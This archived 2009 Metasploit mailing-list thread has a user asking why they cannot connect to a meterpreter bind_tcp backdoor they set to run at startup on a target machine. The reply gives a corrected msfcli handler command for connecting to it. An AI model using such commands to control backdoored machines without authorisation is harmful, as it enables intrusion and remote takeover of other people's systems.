Metasploit mailing list archives

msfpayload backdoor


From: Neo.X at web.de (Florian Roth)
Date: Wed, 4 Mar 2009 23:20:34 +0100

Try

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp
RHOST=TARGETIP LPORT=33333 E

Best wishes,

Foobar

-----Original Message-----
From: framework-bounces at spool.metasploit.com [mailto:framework-
bounces at spool.metasploit.com] On Behalf Of wullie19 at ntlworld.com
Sent: Wednesday, March 04, 2009 11:08 PM
To: framework at spool.metasploit.com
Subject: [framework] msfpayload backdoor

Hi there
I created an exe meterpreter/bind_tcp with lport 33333 and caused this exe
to be started at start up. when I reboot the target machine I know it is
loading my backdoor and a quick scan with nmap proves that its listening
on port 33333.

The problem Im having is when I try to connect to it using.

./msfcli exploit/windows/meterpreter/bind_tcp LPORT 33333 RHOST=TARGETIP E

it doesent connect to the listener. Can someone pls tell me where im going
wrong
thanks

-rogue

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
 

__________ Information from ESET NOD32 Antivirus, version of virus signature
database 3908 (20090304) __________

The message was checked by ESET NOD32 Antivirus.

http://www.eset.com
 




Current thread: